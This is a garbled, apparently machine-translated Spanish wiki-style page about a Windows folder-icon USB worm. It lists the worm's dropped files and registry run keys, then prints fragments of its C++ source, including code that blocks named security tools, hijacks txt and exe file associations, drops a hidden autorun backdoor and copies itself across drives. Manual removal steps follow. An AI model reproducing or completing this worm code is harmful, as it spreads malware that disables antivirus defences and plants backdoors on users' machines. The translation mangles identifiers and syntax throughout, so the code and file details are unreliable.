Código fuente de Wsyscheck

Los virus de iconos de carpetas tienen propiedades de ejecución automática. El virus está escrito en idioma Yi. Después de ejecutarlo, se generará una copia de virus similar a XP-8B618895. EXE, del cual 8B618895 es aleatorio, busca en el dispositivo móvil para generar un archivo de ejecución automática, genera un archivo EXE con el mismo nombre según el nombre de la carpeta en el directorio raíz del dispositivo de almacenamiento móvil y oculta la carpeta original. Además, el virus también eliminará archivos temporales y cookies, y eliminará los registros de acceso de IE TypedURL. Genere el archivo (tome el disco del sistema como unidad C, tome winxp Sp3 como ejemplo, U:\ representa la letra de unidad del disco USB) C:\Windows\System32\XP-8b 618895. Exe1, 501, 856 c:\Windows\System32\System32\og.dll 692 c:\Windows\System32\com.ejecute 270, 336c:\Documents and Settings\Nick\Start Menu\Programs\Start\. lnk apunta a C:\WINDOWS\system32\XP-8b 618895. EXE (tenga en cuenta los espacios) U:\autorun.inf U:\Recycled.exe genera un icono de carpeta en el directorio raíz de la unidad USB. El siguiente es un archivo de biblioteca con el mismo nombre: C:\Windows\System32\Dp1. FNEC:\Windows\System32\eapi.fne C:\Windows\System32\internet.fne C:\Windows\System32\krnln.fnr C:\Windows\System32\regex.fnr C:\Windows\System32\shell.fnec :\Windows\spec.fne agrega un elemento de inicio de registro: HKEY_Local_Machine\Software\Microsoft\Windows\Current Version\run XP-8b 618895 (Esto también es aleatorio y varía según el nombre del virus

[Edite esto párrafo] Código fuente del virus

bool CVirousApp:: abrir archivo de mierda(){ char CmdLine[MAX _ PATH]= { 0 }; char DirUrl[MAX _ PATH]= { 0 } char hijack[MAX_PATH] = { 0 } if (!GetCurrentDirectory(MAX_PATH,DirUrl)) return FALSE char ch = '\\if (ch!= *(DirUrl strlen(DirUrl)-1)){ strcat( DirUrl, " \ \ "; } / /Sprintf (hijack, "s s \ \", dir URL, afxgetapp()-> m _ PS zap pName // Determina si existe.

se puede abrir if (-1 == _access(hijack, 0)) return falseelse { sprintf(CmdLine, "explorer.exe s", hijack); // MessageBox(CmdLine // para probar if(WinExec(CmdLine, SW); _ SHOW) lt; 31) Devolver FALSO}Devolver VERDADERO} 2. Secuestrar archivos "txt, exe" y bloquear herramientas de seguridad comunes //Definir cadena característica BOOL check = TRUEint len ​​​​= 7; USBCleaner", "Kis", "Kav", "IceSword", "Kill", "WSYSCHECK", "360" }; //Obtiene los parámetros y determina si (strcmp(m_lpCmdLine, " ") // Si hay parámetros { // Juzga la cadena característica int I; for(I = 0; iltlenI){ if(strstr str(_ strupr(_ strdup(m _ lpCmdLine)), _ strupr(_ strdup(fuck exe))){ check = FALSO; romper; } } //LPTSTR text; // text=wcschr(m_lpCmdLine, _T(" . ")) 1; CString cmd // if (! wcscmp(ext, _T(" txt ")) if (str str (m_lpCmdLine, _T(".txt") | | strstr(m_lpCmdL línea, _T(".TXT"))) { cmd formato("s s", "notepad.exe", m_lpCmdLine);} else if (strstr ( m_lpcmdline,_t(".exe")| strstr(m_lpcmdline,_t(".exe"){/Esto no es perfecto. Determine si el nombre del archivo es (!Check) {//AfxMessageBox("¡El archivo está dañado! "); MessageBox(vacío, "¡El archivo está dañado! ¡Vuelva a instalar la aplicación!", "Microsoft", MB_OK); Devuelve FALSE} else cmd.

format("s", m_lpCmdLine); } WinExec(cmd, SW_NORMAL); else //Abre el archivo OpenFuckFile(); 3. Secuestra el archivo "exe, txt" //Coloca el carácter del programa FileSource[MAX_PATH] ={0} Copie al directorio del sistema; archivo char new[MAX _ PATH]= { 0 }; MAX_PATH); strcat(FileNew, "\\sys kernel.exe"); CopyFile(FileSource, FileNew, TRUE); SetFileAttributes(FileNew, FILE_ATTRIBUTE_HIDDEN | FILE_ATTRIBUTE_READONLY | FILE_ATTRIBUTE _ SYSTEM);

Obtenga un escritor de inicio automático (HKEY_LOCAL_MACHINE, "Software\\Microsoft\\Windows\\CurrentVersion\\Running", "syskernel", reg_sz, filenew, 0, 0 // escriba el registro secuestrado de caracteres de secuestro de imagen [MAX_PATH] =); { 0 }; sprintf(secuestro, "s 1", FileNew); WriteRegEx(HKEY_LOCAL_MACHINE, "SOFTWARE\\Classes\\txt file\\shell\\open\\command", NULL, REG_SZ, secuestro, 0, 1) ; WriteRegEx(HKEY_LOCAL_MACHINE, "SOFTWARE\\Classes\\exefile\\shell\\open\\command", NULL, REG_SZ, hijack, 0, 1. Libere la puerta trasera Start Bool CVIROUDSLG: :Release Resource(word w); Resourceid, lpctstr lptype, lpctstr nombre de archivo LP) { h hresglobal hResInfo manejar hFileDWORD dwByteshResInfo = FindResource(NULL, MAKEINTRESOURCE(wResourceID), tipo LP); si (hRes == NULL) devuelve FALSEhFile = CreateFile (lpFileName, GENERIC_WRITE, FILE_SHARE_WRITE, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL); si (hFile == NULL) devuelve FALSEWriteFile(hFile, hRes, SizeofResource(NULL, hResInfo), ampdwBytes, NULL); cerrar handle(hFile); return TRUE} VOID CVirousDlg::release door(){ char strSystemPath[MAX_PATH]; obtener el directorio del sistema(strSystemPath, sizeof(strSystemPath)) ; ); ReleaseResource(IDR_BIN, "BIN", strSystemPath); setfile atributos (strSystemPath, FILE_ATTRIBUTE_HIDDEN|FILE_ATTRIBUTE_READONLY|FILE_ATTRIBUTE_SYSTEM);/ / Implementar escritoregex de puerta trasera de inicio automático (HKEY_local_machine, "Software\\Microsoft\\Windows\\Current Version\\ Ejecutar", "SysService", reg_SZ, strsystempath, 0, 0); WinExec(strSy

stemPath, SW_HIDE);} 5. Recorra el disco y cópiese. //Recorre el disco del sistema boolcvirousdlg::fuck file(){ dword dwnumbytesfordrivestrings; //La longitud de la cadena de la letra de la unidad de almacenamiento real LPSTR lp; CString strLogdrive//Obtiene la longitud de la cadena de la letra de la unidad de almacenamiento real dwnumbytesfordrivestrings = Obtener unidades lógicas (0, nulo); //* sizeof(TCHAR); //Si la cadena no está vacía. if (dwnumbytesfordrives!= 0){ LP = new char[dwNumBytesForDriveStrings]; GetLogicalDriveStrings(dwNumBytesForDriveStrings, l p); while (*lp!= 0){ DoBad(LP); } else devuelve FALSE }//Do Bad Void CVIROUDSLG::Dobad(chardrivebuf[]){ cfilefindfinder; //Construye una cadena CString con caracteres comodín strWildcard(drive buf = _T("*.*"); fuente[MAX _ PATH]= { 0 }; archivo char nuevo[MAX _ PATH]= { 0 }; HMODULE hModulehm odule = GetModuleHandle(NULL); GetModuleFileName(hModule, FileSource, MAX _ PATH); odule); //Comienza a procesar archivos BOOL bWorking = finder. FindFile(strWildcard); while(b trabajando){//nReg; bWorking = buscador. BuscarNextFile(); //Omitir. y ..file; de ​​lo contrario, // ¡haremos un bucle infinito! if (finder.IsDots()) continuar; //si directorio, buscar recursivamente if (finder.is directorio() & finder.is system() & finder.is oculto()) { nReg; GetFilePath(), FILE_ATTRIBUTE_HIDDEN | FILE_ATTRIBUTE_SYSTEM)) continuar; sprintf(FileNew, "ss", finder. GetFilePath(), ".exe"); reg(archivo nuevo); } } } Buscador. close();}

[Editar este párrafo] Método de eliminación

1. Descargue usbcleaner y ejecute carpetacure.exe en él. 2. Descargue la herramienta de comprobación de virus con icono de carpeta independiente de usbcleaner, siguiente 3. Eliminación manual: finalizar el proceso XP-8B618895.

EXE (tenga en cuenta que el nombre no es fijo, es mejor usar icesword, su icono es conveniente para distinguir carpetas) Eliminar C:\Windows\System32\ul.dll 2404 C:\Windows\System32\og.dll 692 C: \Windows\System32\com .run 270,336 C:\Documents and Settings\Nick\Menú Inicio\Programa\Inicio\. lnk apunta a C:\Windows\System32\, casi al mismo tiempo que otros archivos sospechosos y estos archivos son un todo) (Aunque los dos artículos originales anteriores no lo mencionaron, se eliminaron juntos y, por supuesto, XP-*. exe los eliminará cuando los vea) (La clave es eliminar lo siguiente, que no se menciona en las soluciones generales en Internet). El siguiente es el archivo de la biblioteca del idioma Yi: C:\Windows\System32\DP 1. FNEC:\Windows\System32\EAPI. FNEC:\Windows\System32\Internet. FNEC:\System32\krnln.fnrc:\Windows\System32\regex.fnrc:\Windows\System32\shell.fnec:\Windows\System32\spec.fne Eliminar elemento de inicio de virus HKEY_LOCAL_MACHINE\Software\Microsoft\Windows \ Versión actual \ ejecute XP-8b 618895 (Esto depende del nombre del virus) Elimine manualmente el icono de la carpeta y el archivo EXE con el mismo nombre en el directorio raíz del disco USB.